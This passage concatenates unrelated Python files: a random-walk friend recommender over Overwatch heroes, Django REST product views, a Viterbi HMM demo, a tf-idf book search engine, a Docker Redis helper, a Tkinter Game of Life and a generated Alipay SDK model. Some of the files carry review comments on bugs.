        """Return the adjacency dict of a vertex (keys are the neighbours)."""
        return self.grafo[elemento]

    def existe_vertice(self, elemento):
        # IDIOM FIX: the original fetched the adjacency dict and compared it
        # with `== None` (PEP 8 violation plus a needless lookup); a plain
        # membership test is equivalent and clearer.
        return elemento in self.grafo

    def obtener_identificadores(self):
        """Return a view of all vertex identifiers."""
        return self.grafo.keys()

    def cantidad_vertices(self):
        return self.cant_vertices

    def cantidad_aristas(self):
        return self.cant_aristas
def crear_grafo():
    """Build the sample Overwatch friendship graph used by the demo below."""
    heroes = ["Genji", "Pharah", "McCree", "Reaper", "Sombra", "Tracer",
              "Hanzo", "Mei", "Widow", "DVA", "Reinhardt", "Zarya",
              "Ana", "Lucio", "Mercy", "Symmetra", "Soldier", "Zenyatta"]
    # NOTE(review): several pairs appear more than once (e.g. Tracer-Widow,
    # Reaper-Soldier); agregar_arista re-adds them and inflates cant_aristas.
    # The duplicates are kept here to preserve the original behaviour exactly.
    amistades = [
        ("Genji", "Hanzo"), ("Genji", "McCree"), ("Genji", "Pharah"),
        ("Genji", "Reaper"), ("Pharah", "Ana"), ("Pharah", "Mercy"),
        ("Tracer", "Sombra"), ("Tracer", "Ana"), ("Tracer", "Lucio"),
        ("Tracer", "Mercy"), ("Tracer", "Widow"), ("Tracer", "Reinhardt"),
        ("McCree", "Hanzo"), ("McCree", "Pharah"), ("McCree", "Ana"),
        ("McCree", "Reaper"), ("McCree", "Sombra"), ("Reaper", "Soldier"),
        ("Reaper", "Ana"), ("Reaper", "Sombra"), ("Reaper", "Widow"),
        ("Reaper", "Soldier"), ("Sombra", "Widow"), ("Sombra", "Symmetra"),
        ("Tracer", "Widow"), ("Tracer", "Lucio"), ("Tracer", "Reinhardt"),
        ("Tracer", "Mercy"), ("Mei", "Mercy"), ("Mei", "DVA"),
        ("Mei", "Soldier"), ("Mei", "Zarya"), ("Ana", "Reinhardt"),
        ("Ana", "Soldier"), ("Mercy", "Soldier"),
    ]
    grafo = Grafo()
    for heroe in heroes:
        grafo.agregar_vertice(heroe)
    for origen, destino in amistades:
        grafo.agregar_arista(origen, destino)
    return grafo
def random_walks(grafo, vertice, n):
    """Do a random walk of n steps starting at `vertice`.

    Returns a dict mapping each visited vertex to its visit count.  The
    current vertex is recorded BEFORE stepping, so the start vertex is always
    counted and the final hop is not.
    """
    actual = vertice
    recorridos = {}
    for i in range(0, n):
        adyacentes = grafo.obtener_adyacentes(actual)
        if not actual in recorridos:
            recorridos[actual] = 1
        else:
            recorridos[actual] += 1
        # Step to a uniformly random neighbour.
        actual = random.choice(list(adyacentes))
    return recorridos
def similares(grafo, usuario, n):
    """Print the n users most similar to `usuario`, estimated by accumulating
    visit counts over three 100-step random walks starting at that user.

    Output format: "a, b, c.\\n" from most to least similar among the top n.
    """
    conteos = {}
    for _ in range(0, 3):
        walks = random_walks(grafo, usuario, 100)
        for visitado, apariciones in sorted(walks.items(), key=lambda par: par[1]):
            conteos[visitado] = conteos.get(visitado, 0) + apariciones
    result = sorted(conteos.items(), key=lambda par: par[1])
    # BUG FIX: the original shadowed the `usuario` parameter with its inner
    # loop variable and then tested `usuario in result` against a list of
    # (user, count) tuples — always False — so the queried user was never
    # removed from his own ranking. Filter him out explicitly instead.
    result = [par for par in result if par[0] != usuario]
    # Walk the tail of the ascending list, i.e. the top-n in descending order.
    for y in range(len(result) - 1, len(result) - n - 1, -1):
        if y == len(result) - n:
            print("{}.\n".format(result[y][0]))
        else:
            print("{}, ".format(result[y][0]), end='')
# Demo: build the sample graph and print the 3 users most similar to Tracer.
grafo = crear_grafo()
similares(grafo, "Tracer", 3)
|
from bottle import route, run
import requests
# API server of Bulkan
# NOTE(review): no @route handlers are registered before run(), so every
# request will 404; `requests` is imported above but unused here.
run(host='localhost', port=8080)
|
from django.db.models import Q
from rest_framework import generics, permissions
from rest_framework.pagination import PageNumberPagination
from . import serializers
from .models import Product, ProductImages
from .serializers import ProductImageSerializer
class StandardResultsSetPagination(PageNumberPagination):
    """Default pagination: 5 items per page, client-overridable via
    ?page_size=... up to a cap of 1000."""
    page_size = 5
    page_size_query_param = 'page_size'
    max_page_size = 1000
class ProductListView(generics.ListAPIView):
    """Paginated product list, available to authenticated users only."""
    queryset = Product.objects.all()
    serializer_class = serializers.ProductSerializer
    permission_classes = (permissions.IsAuthenticated,)
    pagination_class = StandardResultsSetPagination  # split results into pages
class ProductCreateView(generics.CreateAPIView):
    """Create a product; admin users only."""
    queryset = Product.objects.all()
    serializer_class = serializers.ProductSerializer
    permission_classes = (permissions.IsAdminUser,)
class ProductRetrieveView(generics.RetrieveAPIView):
    """Retrieve a single product; authenticated users only."""
    queryset = Product.objects.all()
    serializer_class = serializers.ProductSerializer
    permission_classes = (permissions.IsAuthenticated,)
class ProductDestroyView(generics.DestroyAPIView):
    """Delete a product; admin users only."""
    queryset = Product.objects.all()
    serializer_class = serializers.ProductSerializer
    permission_classes = (permissions.IsAdminUser,)
class ProductImageView(generics.ListAPIView):
    """List all product images."""
    queryset = ProductImages.objects.all()
    serializer_class = ProductImageSerializer

    def get_serializer_context(self):
        # Pass the request to the serializer — presumably so it can build
        # absolute image URLs; verify against ProductImageSerializer.
        return {'request': self.request}
class ProductUpdateView(generics.UpdateAPIView):
    """Update a product; admin users only."""
    queryset = Product.objects.all()
    serializer_class = serializers.ProductSerializer
    permission_classes = (permissions.IsAdminUser,)
class ProductFilterView(generics.ListAPIView):
    """Search products whose title or price contains the `q` query parameter."""
    queryset = Product.objects.all()
    serializer_class = serializers.ProductSerializer

    def get_queryset(self):
        # BUG FIX: `q` may be absent; the original passed None straight into
        # icontains, which raises. Fall back to the unfiltered queryset.
        query = self.request.GET.get('q')
        if not query:
            return Product.objects.all()
        object_list = Product.objects.filter(
            Q(title__icontains=query) | Q(price__icontains=query)
        )
        return object_list
|
# wikipedia
def print_dptable(V):
    """Pretty-print the Viterbi trellis V (a list of {state: prob} dicts):
    a header row of time-step indices, then one row per state.
    (Python 2: print is a statement; trailing commas suppress newlines.)"""
    print "",
    for i in range(len(V)): print "%7d" % i,
    print
    for y in V[0].keys():
        print "%.5s: " % y,
        for t in range(len(V)):
            print "%.7s" % ("%f" % V[t][y]),
        print
def viterbi(obs, states, start_p, trans_p, emit_p):
    """Standard Viterbi algorithm (Wikipedia formulation).

    obs: observation sequence; states: iterable of hidden states;
    start_p[s]: initial probability of s; trans_p[a][b]: transition
    probability a->b; emit_p[s][o]: probability of s emitting o.
    Returns (probability, best_state_path); also prints the trellis.
    """
    V = [{}]      # V[t][y]: probability of the best path ending in y at time t
    path = {}     # best path ending in each state so far
    # Initialise the t = 0 column.
    for y in states:
        V[0][y] = start_p[y] * emit_p[y][obs[0]]
        path[y] = [y]
    # Run Viterbi for t > 0.
    for t in range(1, len(obs)):
        V.append({})
        newpath = {}
        for y in states:
            # Pick the best predecessor y0 for state y at time t.
            (prob, state) = max([(V[t - 1][y0] * trans_p[y0][y] * emit_p[y][obs[t]], y0) for y0 in states])
            V[t][y] = prob
            newpath[y] = path[state] + [y]
        path = newpath
    print_dptable(V)
    # Best final state wins.
    (prob, state) = max([(V[len(obs) - 1][y], y) for y in states])
    return (prob, path[state])
def example():
    """Run viterbi() on the module-level HMM defined below."""
    return viterbi(observations,
                   states,
                   start_probability,
                   transition_probability,
                   emission_probability)
# Example four-state HMM with observations drawn from {G, L, U}.
states = ('1', '2', '3', '4')
observations = ('L', 'U', 'U', 'G', 'U', 'U', 'L', 'L', 'L', 'U', 'G', 'L', 'G')
# Uniform prior over the hidden states.
start_probability = {'1': 0.25, '2': 0.25, '3': 0.25, '4': 0.25}
transition_probability = {
    '1': {'1': 0.1, '2': 0.2, '3': 0.5, '4': 0.2},
    '2': {'1': 0.4, '2': 0.2, '3': 0.2, '4': 0.2},
    '3': {'1': 0.2, '2': 0.2, '3': 0.3, '4': 0.3},
    '4': {'1': 0.2, '2': 0.1, '3': 0.3, '4': 0.4},
}
emission_probability = {
    '1': {'G': 0.5, 'L': 0.3, 'U': 0.2},
    '2': {'G': 0.2, 'L': 0.4, 'U': 0.4},
    '3': {'G': 0.4, 'L': 0.5, 'U': 0.1},
    '4': {'G': 0.3, 'L': 0.3, 'U': 0.4},
}
# Decode the observation sequence and print the result (Python 2 print).
print example()
import pickle
import os
from text_preprocessing import preprocess_text
import math
import heapq
#--------------------------------------------------------STORING_DATA_FUNCTIONS------------------------------------------------------------------
def create_inverted_idx(cwd, encoded_files_folder) -> None:
    """Build an inverted index mapping each encoded word to the ids of all
    documents containing it, and persist it as 'inverted_idx.pickle'.

    Args:
        cwd (str): Current working directory
        encoded_files_folder (str): subfolder where the encoded plots are stored
    """
    folder = cwd + encoded_files_folder
    # Numeric sort so files are not visited in lexicographic order (1, 10, 100, ...).
    ordered_files = sorted(os.listdir(folder),
                           key=lambda name: int(os.path.splitext(name)[0]))
    inverted_idx = {}
    for name in ordered_files:
        doc_id = int(name[:-7])  # strip the trailing '.pickle'
        with open(folder + name, 'rb') as fh:
            encoded_doc = pickle.load(fh)
        # Append this document id under every word it contains.
        for word in encoded_doc:
            inverted_idx.setdefault(word, []).append(doc_id)
    with open('inverted_idx.pickle', "wb") as out:
        pickle.dump(inverted_idx, out)
def create_inverted_idx_2(cwd, encoded_files_folder) -> None:
    """Create and persist an inverted index with tf-idf scores.

    Like ``create_inverted_idx`` but each posting is a ``(doc_id, tfidf)``
    tuple: the stored term frequency is multiplied by
    ``log(total_docs / docs_containing_term)``.  The result is written to
    ``inverted_idx2.pickle`` in the current directory.

    Args:
        cwd (str): Current working directory
        encoded_files_folder (str): subfolder where the encoded plots are stored
    """
    inverted_idx2 = {}
    # Sort the files numerically (lexicographic order would give 1 -> 10 -> 100).
    file_list = os.listdir(cwd + encoded_files_folder)
    file_list = sorted(file_list, key=lambda x: int(os.path.splitext(x)[0]))
    # First pass: postings of (doc_id, raw term frequency).
    docs_count = 0
    for file_name in file_list:
        docs_count += 1
        # splitext instead of the previous hard-coded [:-7] slice, which
        # silently assumed a 7-character ".pickle" extension.
        doc_id = int(os.path.splitext(file_name)[0])
        with open(cwd + encoded_files_folder + file_name, 'rb') as f:
            dict_repr = pickle.load(f)
        for key in dict_repr:
            inverted_idx2.setdefault(key, []).append((doc_id, dict_repr[key]))
    # Second pass: replace each raw term frequency with tf * idf, where
    # idf = log(#documents / #documents containing the term).
    for key in inverted_idx2:
        for idx, value in enumerate(inverted_idx2[key]):
            inverted_idx2[key][idx] = (value[0], value[1] * math.log(docs_count / len(inverted_idx2[key])))
    with open('inverted_idx2.pickle', "wb") as g:
        pickle.dump(inverted_idx2, g)
def store_squared_tfidf_per_document(inverted_idx2) -> None:
    """Compute and persist the sum of squared tf-idf scores per document.

    This is the squared ``|d|`` factor of the cosine-similarity formula.
    The mapping {doc_id: sum of tfidf**2} is written to
    ``squared_tfidf_per_document.pickle`` in the current directory.

    Args:
        inverted_idx2 (dict): the inverted index with tfidf scores
            (term -> list of (doc_id, tfidf) tuples)
    """
    squared_tfidfs = {}
    # Accumulate the running sum directly instead of collecting a list of
    # squares per document and summing afterwards (same values, less memory).
    for term in inverted_idx2:
        for doc, tfidf in inverted_idx2[term]:
            squared_tfidfs[doc] = squared_tfidfs.get(doc, 0) + tfidf ** 2
    with open('squared_tfidf_per_document.pickle', "wb") as g:
        pickle.dump(squared_tfidfs, g)
#------------------------------------------------------------HELPER FUNCTIONS----------------------------------------------------------
def encode_query(query, vocabulary):
    """Map every token of *query* to its integer code via *vocabulary*.

    Args:
        query (list): tokenized textual query
        vocabulary (dict): mapping from words to integer codes

    Returns:
        [list or bool]: the list of codes, or False as soon as any token is
        missing from the vocabulary
    """
    encoded = []
    for token in query:
        # Guard clause: an unknown token makes the whole query unanswerable.
        if token not in vocabulary:
            return False
        encoded.append(vocabulary[token])
    return encoded
def get_top_k(dic, k):
    """Return the k (key, value) items of *dic* with the largest values.

    Ties on the value are broken by ascending key, exactly as a min-heap of
    (-value, key) pairs would order them.

    Args:
        dic (dict): a dictionary with comparable values

    Returns:
        [type]: a list of the top k dict items, best first
    """
    # Negate values so an ascending sort yields "largest value first";
    # sorted(...)[: k] is equivalent to heapq.nsmallest(k, ...).
    inverted = sorted((-value, key) for key, value in dic.items())
    return [(key, -neg_value) for neg_value, key in inverted[:k]]
def compute_cosine_similarity(encoded_query, docs_scores, squared_tfidf_per_document) -> dict:
    """Compute the cosine similarity between the query and each document.

    Each query term is assumed to have weight 1, so the query norm is simply
    sqrt(len(encoded_query)).

    Args:
        encoded_query (list): a textual query, encoded in integers
        docs_scores (dict): doc -> sum of its tfidf scores for ONLY the query words
        squared_tfidf_per_document (dict): doc -> sum of its squared tfidf scores for ALL its words

    Returns:
        [dict]: doc -> cosine similarity with respect to the query
    """
    query_norm = math.sqrt(len(encoded_query))
    return {
        doc: score / (math.sqrt(squared_tfidf_per_document[doc]) * query_norm)
        for doc, score in docs_scores.items()
    }
#------------------------------------------------------------PRINT FUNCTIONS-----------------------------------------------------------
def print_search_engine_result(result):
    """Print title, plot and URL for every document returned by engine 1.

    The fields are fetched from the per-article ``.tsv`` files on disk.

    Args:
        result (list): document ids selected by the search engine
    """
    separator = '----------------------------------------------------------------------------------------------' + '\n'
    for book in result:
        tsv_path = os.getcwd() + '\\tsvs\\' + 'article_' + str(book) + '.tsv'
        with open(tsv_path, 'r', encoding='utf-8') as f:
            # Row 2 of the tsv holds the data; columns are tab-separated.
            all_fields = f.readlines()[2].split('\t')
        print("")
        for label, field in (('--BOOKTITLE--', all_fields[0]),
                             ('--PLOT--', all_fields[6]),
                             ('--URL--', all_fields[-1])):
            print(label)
            print(field + '\n')
        print(separator)
def print_search_engine_2_result(result):
    """Print title, plot, URL and similarity for each ranked result.

    The fields are fetched from the per-article ``.tsv`` files on disk.

    Args:
        result (list): (document id, similarity score) pairs, best first
    """
    separator = '----------------------------------------------------------------------------------------------' + '\n'
    for book, score in result:
        tsv_path = os.getcwd() + '\\tsvs\\' + 'article_' + str(book) + '.tsv'
        with open(tsv_path, 'r', encoding='utf-8') as f:
            # Row 2 of the tsv holds the data; columns are tab-separated.
            all_fields = f.readlines()[2].split('\t')
        print("")
        for label, field in (('--BOOKTITLE--', all_fields[0]),
                             ('--PLOT--', all_fields[6]),
                             ('--URL--', all_fields[-1])):
            print(label)
            print(field + '\n')
        print('--SIMILARITY--')
        print(round(score,2), '\n')
        print(separator)
#------------------------------------------------------------SEARCH ENGINES---------------------------------------------------------------
def search_engine(encoded_query, inverted_idx):
    """Conjunctive (AND) search over the inverted index.

    Args:
        encoded_query (list): a textual query, encoded in integers
        inverted_idx (dict): token -> ascending list of document ids

    Returns:
        [list]: ids of the documents containing every query token,
        in ascending order
    """
    if not encoded_query:
        return []
    # Intersect the posting lists of all query tokens.  Each posting list is
    # stored in ascending order with unique ids, so sorting the set
    # intersection reproduces exactly what the multi-way merge emitted.
    common = set(inverted_idx[encoded_query[0]])
    for token in encoded_query[1:]:
        common &= set(inverted_idx[token])
    return sorted(common)
def search_engine_2(encoded_query, inverted_idx2, squared_tfidf_per_document, k):
    """Ranked conjunctive search: top-k documents by cosine similarity.

    Only documents containing ALL query tokens are considered; their score is
    the cosine similarity between the query (unit term weights) and the
    document's tfidf vector restricted to the query terms.

    Args:
        encoded_query (list): a textual query, encoded in integers
        inverted_idx2 (dict): token -> list of (doc_id, tfidf) postings
        squared_tfidf_per_document (dict): doc -> sum of its squared tfidf scores
        k (int): number of output documents

    Returns:
        [list]: the top k (doc, similarity) pairs, best first
    """
    if not encoded_query:
        return []
    # One {doc: tfidf} lookup per query token (each doc occurs at most once
    # per posting list, so the dict conversion is lossless).
    postings = [dict(inverted_idx2[token]) for token in encoded_query]
    # Documents containing every token of the query.
    common = set(postings[0])
    for posting in postings[1:]:
        common &= set(posting)
    # Cosine numerator: sum of the doc's tfidf scores over the query tokens,
    # added in query-token order (matches the original merge's summation).
    docs_scores = {doc: sum(posting[doc] for posting in postings) for doc in common}
    # Normalize to cosine similarity and keep only the k best (via heaps).
    all_scores = compute_cosine_similarity(encoded_query, docs_scores, squared_tfidf_per_document)
    return get_top_k(all_scores, k)
def search_engine_3(encoded_query, inverted_idx2, squared_tfidf_per_document, uncoded_query):
    """Interactive re-ranking engine.

    Uses search engine 2 to get the top 10 documents with highest similarity
    to the query, then prompts the user for additional field constraints
    (e.g. bookTitle, setting), boosts the score of every document whose field
    matches by 50%, and returns the top 3 books by the adjusted score.

    Args:
        encoded_query (list): a textual query, encoded in integers
        inverted_idx2 (dict): the inverted index with tfidf scores
        squared_tfidf_per_document (dict): |d| of the cosine similarity formula (before sqrt)
        uncoded_query (list): the same textual query, not encoded in integers

    Returns:
        [list]: the top 3 (doc, score) pairs ranked by the adjusted score
    """
    # apply the second search engine (plot only)
    plot_result = search_engine_2(encoded_query, inverted_idx2, squared_tfidf_per_document, 10)
    additional_info = []
    # maps each additional field to its column position in the .tsv files
    field_to_idx = {
        'booktitle' : 0,
        'bookseries' : 1,
        'bookauthors' : 2,
        'publishingdate': 8,
        'characters' : 9,
        'setting' : 10
    }
    # prompt the user for "field:value" constraints until they type "end"
    while True:
        try:
            info = input('please insert additional_info:\n Insert field name followed by ":" and the value\n Type "end" when you are done\n').lower()
            if info == 'end':
                break
            info = info.split(':')
            if info[0] in field_to_idx:
                additional_info.append(info)
            else:
                print('field not found, please try again\n')
        except:
            # malformed input (e.g. EOF) is treated like an unknown field
            print('field not found, please try again\n')
    final_score = {}
    # iterate over each book returned by the second search engine
    for doc, score in plot_result:
        total_score = score
        with open('.\\tsvs\\article_'+str(doc)+'.tsv', 'r', encoding = 'utf-8') as f:
            all_fields = f.readlines()[2].split('\t')
            all_fields = [preprocess_text(field) for field in all_fields]
            # each matching constraint boosts the score by 50%
            for item in additional_info:
                if item[1] in all_fields[field_to_idx[item[0]]]:
                    total_score += total_score * 1/2
        # final score for each document
        final_score[doc] = total_score
    # return the top 3 documents based on the new scoring
    return get_top_k(final_score, 3)
#--------------------------------------------------------------------------------------------------------------------
if __name__ == "__main__":
    cwd = os.getcwd()
    encoded_files_folder = "\\encoded_files\\"
    # One-off index builders -- uncomment to (re)generate the pickles below.
    #create_inverted_idx(cwd, encoded_files_folder)
    #create_inverted_idx_2(cwd, encoded_files_folder)
    # Load the precomputed index structures from disk.
    with open('inverted_idx.pickle', 'rb') as h:
        inverted_idx = pickle.load(h)
    with open('inverted_idx2.pickle', 'rb') as h:
        inverted_idx2 = pickle.load(h)
    with open('vocabulary.pickle', 'rb') as q:
        vocabulary = pickle.load(q)
    #store_squared_tfidf_per_document(inverted_idx2)
    with open('squared_tfidf_per_document.pickle', "rb") as q:
        squared_tfidf_per_document = pickle.load(q)
    # Read, normalize and encode the user's query, then run all three engines.
    query = input('enter your query:\n')
    preprocessed_query = preprocess_text(query)
    encoded_query = encode_query(preprocessed_query, vocabulary)
    print_search_engine_result(search_engine(encoded_query, inverted_idx))
    print_search_engine_2_result(search_engine_2(encoded_query, inverted_idx2, squared_tfidf_per_document, 5))
    print_search_engine_2_result(search_engine_3(encoded_query, inverted_idx2, squared_tfidf_per_document, preprocessed_query))
|
import docker
import redis
class RedisDB():
    """Spin up a throw-away Redis server in Docker and expose three clients.

    Logical databases: db 0 -> topic, db 1 -> agg, db 2 -> activity.
    """

    def __init__(self, image):
        docker_client = docker.from_env()
        # Detached container, auto-removed as soon as it is stopped.
        self.container = docker_client.containers.run(
            image=image,
            name='redis_container',
            ports={6379: 6379},
            detach=True,
            remove=True  # Remove container when stopped
        )
        # One client per logical Redis database on the published port.
        self.topic = redis.Redis(host='localhost', port=6379, db=0)
        self.agg = redis.Redis(host='localhost', port=6379, db=1)
        self.activity = redis.Redis(host='localhost', port=6379, db=2)

    def stop(self):
        """Stop the backing container (which also removes it)."""
        self.container.stop()
|
from django.db import models
class Person(models.Model):
    """Minimal person record: name, gender and an age defaulting to 5."""
    name = models.CharField(max_length=50)
    gender = models.CharField(max_length=50)
    age = models.IntegerField(default=5)

    def __str__(self):
        # Display a person by name only.
        return '{0.name}'.format(self)
|
# -*- coding:Utf-8 -*-
class BaseController:
    """MVC wiring: holds references to a model and its viewer."""

    def __init__(self, model, viewer):
        # Keep both references so subclasses can coordinate model and view.
        self.model, self.viewer = model, viewer
|
import tkinter as tk
from time import sleep
import random
class Application(tk.Frame):
    """Tkinter UI for Conway's Game of Life on a 25x25 grid of buttons.

    Each cell is a tk.Button whose background color encodes its state:
    black = alive, white = dead.  A side panel shows the rules, preset
    patterns (blinker, glider, toad, random) and play/step/clear/stop
    controls.
    """

    def __init__(self, master=None):
        super().__init__(master)
        self.master = master
        self.pack()
        self.create_widgets()
        # generation counter shown next to "Generation number:"
        self.counter = 0

    def create_widgets(self):
        """Build the 25x25 cell grid plus the side panel of labels/buttons."""
        self.button_arr = [[] for i in range(25)]
        for i in range(25):
            for j in range(25):
                # row/col are bound as default arguments so every button
                # captures its own coordinates (avoids the late-binding
                # closure pitfall).
                def on_click(row=i, col=j):
                    cur_color = self.button_arr[row][col]['bg']
                    # based on the current color, set the opposite color
                    if cur_color == "black":
                        self.button_arr[row][col].configure(bg="white")
                    if cur_color == "white":
                        self.button_arr[row][col].configure(bg="black")
                self.button_arr[i].append(tk.Button(self, bg='white', height=1, width=2,
                                                    command=on_click))
                self.button_arr[i][j].grid(row=i, column=j, sticky=tk.S)
        self.title = tk.Label(self, text="Game of Life", font=("Courier", 36, "bold"))
        self.title.grid(row=0, column=25, columnspan=8)
        self.gen_number_text = tk.Label(self, text="Generation number:", font=("Courier", 13, "bold"))
        self.gen_number_text.grid(row=1, column=28, columnspan=1)
        self.gen_number = tk.Label(self, text="0", font=("Courier", 12))
        self.gen_number.grid(row=1, column=29)
        self.rules1 = tk.Label(self, text="A black cell is alive. A white cell is dead. A cell's neighbors are adjacent")
        self.rules1.grid(row=2, column=25, columnspan=8)
        # NOTE(review): self.rules1 is rebound here, orphaning the label above
        # (it stays on screen but is no longer reachable via an attribute).
        self.rules1 = tk.Label(self, text="vertically, horizontally, or diagonally. Evolution occurs according to these rules:")
        self.rules1.grid(row=3, column=25, columnspan=8)
        self.rules2 = tk.Label(self, text="1. Any live cell with two or three live neighbours survives.")
        self.rules2.grid(row=4, column=25, columnspan=8)
        self.rules3 = tk.Label(self, text="2. Any dead cell with three live neighbours becomes a live cell.")
        self.rules3.grid(row=5, column=25, columnspan=8)
        self.rules4 = tk.Label(self, text="3. All other live cells die in the next generation. Similarly, all other dead cells stay dead.")
        self.rules4.grid(row=6, column=25, columnspan=8)
        self.play = tk.Button(self, text='Play', command=self.on_play)
        self.play.grid(row=8, column=29)
        self.step = tk.Button(self, text='Step', command=self.on_step)
        self.step.grid(row=8, column=30)
        self.clear = tk.Button(self, text='Clear', command=self.clear_screen)
        self.clear.grid(row=8, column=31)
        self.stop = tk.Button(self, text='Stop', command=self.on_stop)
        self.stop.grid(row=8, column=32, padx=(0, 10))
        self.blinker = tk.Button(self, text='Blinker', command=self.on_blinker)
        self.blinker.grid(row=8, column=25, padx=(10, 0))
        self.glider = tk.Button(self, text='Glider', command=self.on_glider)
        self.glider.grid(row=8, column=26)
        self.toad = tk.Button(self, text='Toad', command=self.on_toad)
        self.toad.grid(row=8, column=27)
        self.random = tk.Button(self, text='Random', command=self.on_random)
        self.random.grid(row=8, column=28, sticky=tk.W)
        self.message = tk.Message(self, text="The Game of Life is a cellular automaton created by British mathematician John Horton Conway. The game became widely known after being mentioned in a 1970 Scientific American article. The game consists of a collection of cells which live, die, or multiply based on mathematical principles. The game is a powerful example of emergence and self-organization, providing insight into how complex patterns can emerge from the implementation of the game's simple rules. For this reason, the Game of Life has been studied by scholars in fields ranging from biology and physics to philosophy and economics.", font=("Courier", 12))
        self.message.config(aspect=200)
        self.message.grid(row=10, column=25, padx=(10, 0), columnspan=8, rowspan=14, sticky=tk.N)

    def get_neighbors(self, row, col):
        """Return the buttons of the up-to-8 neighbors inside the 25x25 grid."""
        coords = [(row-1, col-1), (row-1, col), (row-1, col+1),
                  (row , col-1), (row , col+1),
                  (row+1, col-1), (row+1, col), (row+1, col+1)]
        neighbors = []
        for r, c in coords:
            # drop coordinates that fall off the board edges
            if (r > -1 and r < 25) and (c > -1 and c < 25):
                neighbors.append(self.button_arr[r][c])
        return neighbors

    def on_stop(self):
        """Stop the play loop and re-enable the control buttons."""
        self.keep_going = False
        self.blinker.config(state="normal")
        self.glider.config(state="normal")
        self.random.config(state="normal")
        self.step.config(state="normal")
        self.clear.config(state="normal")
        self.play.config(state="normal")

    def clear_screen(self):
        """Stop the simulation, whiten every cell and reset the counter."""
        self.on_stop()
        for k in range(25):
            for f in range(25):
                self.button_arr[k][f].configure(bg='white')
        self.counter = 0
        self.gen_number['text'] = str(self.counter)

    def on_blinker(self):
        """Paint the 3-cell 'blinker' oscillator near the board center."""
        self.button_arr[10][9].configure(bg="black")
        self.button_arr[10][10].configure(bg="black")
        self.button_arr[10][11].configure(bg="black")

    def on_glider(self):
        """Paint the 5-cell 'glider' spaceship near the board center."""
        self.button_arr[8][10].configure(bg="black")
        self.button_arr[9][11].configure(bg="black")
        self.button_arr[10][9].configure(bg="black")
        self.button_arr[10][10].configure(bg="black")
        self.button_arr[10][11].configure(bg="black")

    def on_toad(self):
        """Paint the 6-cell 'toad' oscillator near the board center."""
        self.button_arr[10][9].configure(bg="black")
        self.button_arr[10][10].configure(bg="black")
        self.button_arr[10][11].configure(bg="black")
        self.button_arr[11][8].configure(bg="black")
        self.button_arr[11][9].configure(bg="black")
        self.button_arr[11][10].configure(bg="black")

    def on_random(self):
        """Set every cell to black or white uniformly at random."""
        for k in range(25):
            for f in range(25):
                random_color = random.choice(['black', 'white'])
                self.button_arr[k][f].configure(bg=random_color)

    def on_play(self):
        """Disable editing and run generations until Stop is pressed.

        NOTE(review): this blocks inside a while/sleep loop; the UI stays
        responsive only because apply_rules() calls update() on every
        button.  The idiomatic Tk approach would be self.after() scheduling
        -- confirm before changing.
        """
        for k in range(25):
            for f in range(25):
                self.button_arr[k][f].config(state="disabled")
        self.blinker.config(state="disabled")
        self.glider.config(state="disabled")
        self.random.config(state="disabled")
        self.step.config(state="disabled")
        self.clear.config(state="disabled")
        self.play.config(state="disabled")
        self.keep_going = True
        while self.keep_going:
            self.apply_rules()
            sleep(0.2)
        # loop ended via on_stop(): make the grid editable again
        for k in range(25):
            for f in range(25):
                self.button_arr[k][f].config(state="normal")

    def on_step(self):
        """Advance the simulation by exactly one generation."""
        self.apply_rules()

    def apply_rules(self):
        """Compute the next generation and repaint the whole grid at once."""
        # start from an all-dead ("white") future grid
        future_colors = []
        for x in range(25):
            future_colors.append([])
            for y in range(25):
                future_colors[-1].append("white")
        # apply the rules and build a separate grid of future values
        for r in range(25):
            for c in range(25):
                # Any live cell with fewer than two live neighbours dies, as if by underpopulation.
                bg_black_list = []
                for n in self.get_neighbors(r, c):
                    bg = n['bg']
                    bg_black_list.append(bg == 'black')
                # bg_black_list = [bg1 == 'black', bg2 == 'black', bg3 == 'black']
                count_bg_black = bg_black_list.count(True)
                if self.button_arr[r][c]['bg'] == 'black':
                    # survival: exactly 2 or 3 live neighbours
                    if count_bg_black >= 2 and count_bg_black <= 3:
                        future_colors[r][c] = "black"
                    else:
                        future_colors[r][c] = "white"
                if self.button_arr[r][c]['bg'] == 'white':
                    # birth: exactly 3 live neighbours
                    if count_bg_black == 3:
                        future_colors[r][c] = "black"
        # using the newly built grid of values, change all colors at the same time
        for r in range(25):
            for c in range(25):
                self.button_arr[r][c].configure(bg=future_colors[r][c])
                self.button_arr[r][c].update()
        # change generation number
        self.counter += 1
        self.gen_number['text'] = str(self.counter)
if __name__ == "__main__":
    # Launch the GUI only when this file is executed directly; importing the
    # module for its Application class no longer opens a window.
    root = tk.Tk()
    app = Application(master=root)
    app.mainloop()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.RepairItem import RepairItem
class AlipayInsAutoAutoaftermarketInserviceorderNotifyModel(object):
    """Generated Alipay SDK payload model.

    Plain data holder whose fields are exposed through property pairs and
    converted to/from the Alipay wire-dict format by ``to_alipay_dict`` /
    ``from_alipay_dict``.
    """

    def __init__(self):
        # all fields default to None until set via their properties
        self._ant_ser_apply_no = None
        self._event_time = None
        self._extra = None
        self._inst_ser_apply_no = None
        self._repair_item = None
        self._status = None

    @property
    def ant_ser_apply_no(self):
        return self._ant_ser_apply_no

    @ant_ser_apply_no.setter
    def ant_ser_apply_no(self, value):
        self._ant_ser_apply_no = value

    @property
    def event_time(self):
        return self._event_time

    @event_time.setter
    def event_time(self, value):
        self._event_time = value

    @property
    def extra(self):
        return self._extra

    @extra.setter
    def extra(self, value):
        self._extra = value

    @property
    def inst_ser_apply_no(self):
        return self._inst_ser_apply_no

    @inst_ser_apply_no.setter
    def inst_ser_apply_no(self, value):
        self._inst_ser_apply_no = value

    @property
    def repair_item(self):
        return self._repair_item

    @repair_item.setter
    def repair_item(self, value):
        # Only list values are accepted; non-list values leave the field
        # unchanged.  Plain dicts are promoted to RepairItem instances.
        if isinstance(value, list):
            self._repair_item = list()
            for i in value:
                if isinstance(i, RepairItem):
                    self._repair_item.append(i)
                else:
                    self._repair_item.append(RepairItem.from_alipay_dict(i))

    @property
    def status(self):
        return self._status

    @status.setter
    def status(self, value):
        self._status = value

    def to_alipay_dict(self):
        """Serialize this model to a plain dict in Alipay wire format.

        Fields that are falsy (None, empty) are omitted.
        """
        params = dict()
        if self.ant_ser_apply_no:
            if hasattr(self.ant_ser_apply_no, 'to_alipay_dict'):
                params['ant_ser_apply_no'] = self.ant_ser_apply_no.to_alipay_dict()
            else:
                params['ant_ser_apply_no'] = self.ant_ser_apply_no
        if self.event_time:
